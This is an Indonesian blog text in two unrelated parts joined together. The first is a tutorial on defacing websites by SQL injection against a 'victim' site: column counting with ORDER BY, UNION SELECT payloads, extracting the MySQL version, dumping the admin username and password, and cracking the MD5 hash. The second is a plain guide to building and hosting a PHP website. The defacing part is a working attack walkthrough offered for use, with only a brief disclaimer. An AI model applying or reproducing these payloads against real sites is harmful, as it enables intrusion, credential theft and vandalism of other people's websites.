Men-deface sebuah situs itu sebenarnya pekerjaan yang tidak terlalu sulit. Bahkan untuk sekelas Hacker pemula dapat melakukannya. Banyak sekali software yang dapat digunakan seperti Havij dan sejenisnya, dan tinggal mengikuti langkahnya, semuanya jadi mudah. Tinggal cari Dork-nya, kemudian identifikasi situs korban, dan eksekusi. Namun, ada dasar teknik tanpa software yang dapat kita lakukan. Teknik ini sebenarnya agak rumit, namun akan saya coba sederhanakan agar mudah dipraktekkan. Sebelumnya kita harus tahu dulu yang dimaksud defacing itu sebenarnya apa. Defacing adalah tindakan untuk mengganti file index.html atau index.php situs korban dengan file yang kita miliki. Ketika file index.html atau index.php situs korban kita ganti dengan index.html atau index.php yang kita inginkan, praktis publik akan hanya melihat index.html ataupun index.php yang kita miliki. Pengetahuan dasar yang harus dimiliki untuk melakukan defacing. SQL Injection (Untuk menganalisis loop website) Sandi Admin Shell Script (untuk mendapatkan Kontrol Admin) Sekarang, mari kita coba dengan cara yang paling sederhana agar mudah dipahami. Langkah pertama adalah dengan menguji kerentanan situs korban. Misalnya saja kita mengidentifkasi situs korban sebagai berikut: http://www.korban.com/news.php?id=5. Mari kita uji apakah situs tersebut aman atau mudah dideface. Lankah yang paling sederhana adalah dengan menamnahkan tanda kutipan (‘) ke akhir url dari situs korban. Dari contoh diatas, kemudian situs korban kita uji kerentanannya sebagai berikut: [code]http://www.korban.com/news.php?id=5 '[/code] jadi jika kita mendapatkan beberapa error seperti dibawah ini: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…” atau sesuatu yang serupa yang berarti Situs rentan terhadap SQL injection. Langkah kedua, setelah kita tahu betul bahwa situs korban tersebut rentan untuk di deface, kita lakukan langkah penemuan kolom dengan menggunakan perintah Order by. Kita lakukan pengurutan nomer sampai mendapatkan error. Sebagai contoh: [code]http://www.korban.com/news.php?id=5 order by 1 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 2 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 3 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 4 / * <- error (kita mendapatkan pesan seperti kolom ini '4 Unknown 'dalam' klausa order 'atau sesuatu seperti itu) [/code] Dari hasil tersebut, berarti bahwa MySQL situs korban memiliki 3 kolom, karena pada saat diurutkan (incrementing) sampai langkah ke empat terdapat error. Langkah ketiga adalah dengan melakukan pengujian fungsi UNION. Dengan fungsi ini kita dapat memilih lebih banyak data dalam satu pernyataan sql. Contohnya sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3 (kita unionkan semua kolom yang sudah kita dapatkan dilangkah ke 2 diatas.) [/code] Catatan Penting: jika kita melihat beberapa nomor di layar monitor, yaitu 1 atau 2 atau 3 maka UNION bekerja. Langkah keempat adalah melakukan pengujian pada versi MySQL situs korban dengan perintah tambahan tanda minus dua kali (–). Jadinya seperti dibawah ini: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3-- [/code] Kemudian amati output yang muncul di monitor. Misalnya saja di monitor muncul angka 2, segera kita ganti URL target dengan kode “@@version” atau “version()” atau kode tertentu seperti “4.1.33″ atau yang mirip dengan angka tersebut. URL target yang kita ganti adalah sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,@@version,3-- [/code] Kemudian tekan enter (lakukan eksekusi). Jika kemudian dilayar monitor muncul error sebagai berikut: “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”, kemudian langkah selanjutnya adalah melakukan konversi dengan mengubah URL target sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,convert(@@version using latin1),3 atau http://www.korban.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3[/code] Nah, versi dari MySQL situs korban dapat kita identifikasi. Langkah selanjutnya adalah dengan mendeteksi nama-nama dari setiap kolom tabel databse situs korban. Jika versi MySQL nya dibawah versi 5, kita dapat mengira-iranya. Misalnya saja kalau Platformnya wordpress pastilah nama tabelnya sekitar wp-content, wp-users, wp-options dan seterusnya. Dan nama kolom umumnya adalah: username, user_name, password, pass, passwd, pwd dll .. Coba kita lakukan pengecakan nama tabel dari MySQL situs korban dengan perintah dibawah ini: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3 from admin [/code] Jika di monitor muncul angka misalnya “2″, maka berarti bahwa nama tabel tersebut adalah benar. Langkah selanjutnya adalah mengidentifikasi nama kolom dalam tabel admin. Dengan mengganti angka 2 dengan nama kolom yang kita inginkan. Perintahnya adalah sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,username,3 from admin [/code] Jika muncul nama di layar monitor, maka itulah nama admin dari situs korban. Langkah selanjutnya adalah mengidentifikasi password admin. [code]http://www.korban.com/news.php?id=5 union all select 1,password,3 from admin [/code] Jika dilayar muncul kode (biasanya dalam bentuk enkripsi MD5), maka sukseslah injeksi MySQL kita untuk selanjutnya melakukan deface. Kode yang muncul dilayar, kemudian kita catat, dan lakukan dekripsi MD5 dengan Decrypt MD5 Generator yang banyak beredar di internet. Setelah nama admin kita dapet, password admin kita dapet, terus langkah selanjutnya ya terserah Anda. Tetapi perlu diingat, pengetahuan ini bukan digunakan untuk mengajarkan kejahatan. Tetapi dari semua langkah tersebut diatas dapat digunakan oleh webmaster situs bersangkutan untuk menguji kerentanan situsnya. Jika dicoba dengan cara ini kemudian berhasil, maka segera lakukan perbaikan. Jangan sampai terlambat.

Untuk membuat website .com yang dihosting anda harus benar-benar mempunyai pengetahuan pemrograman, karena kalau hanya menguasai HTML, maka hasilnya bisa jadi website yang menyedihkan dalam arti yang sesungguhnya. Kalau saudara ingin membuat website dari file yang bisa di hosting, maka setidaknya anda harus menguasai 3 hal: 1.Bahasa Pemrograman Tertentu seperti PHP 2.Penggunaan Software Editor File Web 3.Pengelolaan database seperty MySQL Belajar Bahasa Pemrograman Untuk Membuat Website Kalau saudara mau belajar, maka sebaiknya saudara membeli satu buku panduan di toko buku tentang PHP dan MySQL. Atau kalau saudara mau belajar sendiri saudara bisa mencoba website yang luar biasa W3SCHOOL (harus ada dasar bahasa inggris yang cukup). Lihat menu pembelajarannya di sidebar sebelah kiri. Belajar Program Pembuat Website Seperti Dreamweaver Menguasai bahasa pemrograman saja tidak berarti anda bisa membuat websitenya tanpa bantuan, jadi anda perlu belajar cara membuat website dengan menggunakan software. Salah satu software yang cukup umum digunakan adalah Adobe Dreamweaver. Saudara bisa membeli buku panduan Adobe Dreamweaver di toko-toko buku terdekat, karena panduan menggunakan buku jauh lebih terstruktur. Kalaupun saudara harus belajar dari dasar, tidak akan terlalu sulit. Dalam jangka waktu sekitar 2 minggu saudara sudah bisa merampungkan website PHP sederhana milik saudara.... Tapi kalau masalahnya ada di ekonomi yang lagi seret buat beli buku.... Bisa coba baca tutorial e-book di http://www.bgsu.edu/downloads/cio/file17760.pdf .... tapi bahasa inggris ya.... Bagaimana Kalau Malas Membuat Template Website Sendiri? Kalau saudara malas membuat template sendiri, maka saudara sebaiknya mendownload template PHP yang sudah jadi. Salah satu penyedia template PHP gratis adalah http://www.phpjabbers.com/free-website-templates.php. Anda bisa memilih beragam template pada situs ini.... tapi harus daftar dan login dulu kalau mau download.... Kalau saudara sudah dapat templatenya, maka silahkan edit templatenya dengan menggunakan Adobe Dreamweaver, jika diperlukan. Bagian terpenting dari sebuah website PHP adalah anda harus paham bagaimana cara menggunakan halaman PHP yang khusus untuk ADMIN, atau bagaimana cara mengubah struktur database MySQL sesuai kebutuhan anda.... Membeli Domain dan Hosting untuk Website Anda Saat ini sudah banyak sekali jasa hosting dan jual nama domain. Anda bisa melakukan browsing di Google untuk mendapatkan penawaran Hosting yang terbaik.... Banyaklah bertanya dengan Customer Service jika memang diperlukan..... Perhatikan juga syarat layanan dari hosting, karena terkadang mereka tidak menerima situs-situs tertentu, seperti perjudian, iklan baris, pornografi, dan lain sebagainya. Ini sangat penting sebelum anda terlanjur beli dan bermasalah di kemudian hari..... Kalau saudara belum pernah memesan domain dan hosting, maka ada 3 hal yang harus saudara pastikan tidak terlewatkan dari email penyedia hosting, yaitu: HOST FTP Username CPANEL, dan Password CPANEL Kalau saudara bingung, maka tanyakan saja ke CSnya lagi. Upload File Template Website PHP ke Hosting Untuk melakukan ini saudara bisa menggunakan software gratis FileZilla. Kalau belum punya saudara bisa mengunduhnya dari website resmi FileZilla. Kalau saudara adalah pengguna Windows, maka download file yang paling atas. Filezilla ini bisa anda gunakan untuk memindahkan file template website PHP tadi ke folder Public_HTML yang ada di hosting berdomain yang sudah anda beli. Yang perlu anda lakukan cuma connect, dan setelahnya anda cukup click and drag untuk memindahkan satu file. Kalau filenya banyak berarti anda harus membuka dulu folder Public_HTML dengan mengkliknya, setelah itu saudara bisa menyorot semua file yang hendak saudara pindahkan. Yang perlu anda lakukan hanyalah klik kanan dan pilih menu UPLOAD untuk memindahkan semua file tadi ke folder Public_HTML.... Mungkin untuk lebih memudahkan saudara memahami ini coba lihat video dari user Youtube DEN BAGUS di bawah ini.... http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=video&cd=1&cad=rja&uact=8&ved=0CBwQtwIwAA&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DMsFcryMv1zA&ei=Nq-jVPDdEMiNuATbtoHoCQ&usg=AFQjCNHSe6fM3RI0Trg0yRerKA21RopItg&sig2=S45-baGisenTuySNX4GQ_g Kalau file sudah saudara upload ke folder Public_HTML. Berarti semua orang sudah bisa mengakses file website yang sudah saudara kirimkan tadi di alamat domain .com yang sudah saudara bayar penggunaannya untuk jangka waktu tertentu.... Alasan Menggunakan Domain .COM? Tidak ada masalah SEO Friendly di sini.... Karena Google sama sekali tidak memberi keistimewaan pada satu jenis TLD tertentu. Alasan utama menggunakan .com adalah paling mudah diingat oleh pengguna.... Maksud saya seperti ini? Kalau saudara punya nama domain www.kucinglucu.net, maka biasanya saat ada pengunjung berusaha berkunjung balik maka mereka akan mengunjungi www.kucinglucu.com. Jadi tidak ada alasan teknis SEO yang aneh-aneh dalam masalah domain ini. RANGKUMAN Saudara bisa membuat website .com sendiri dengan membuat blog gratis yang diubah nama domainnya. Bisa juga dengan membuat file template sendiri dengan menggunakan software seperti Adobe Dreamweaver, lalu upload dengan menggunakan software FTP seperti FileZilla ke hosting berdomain .com yang sudah anda bayar penggunaannya dalam kurun waktu tertentu.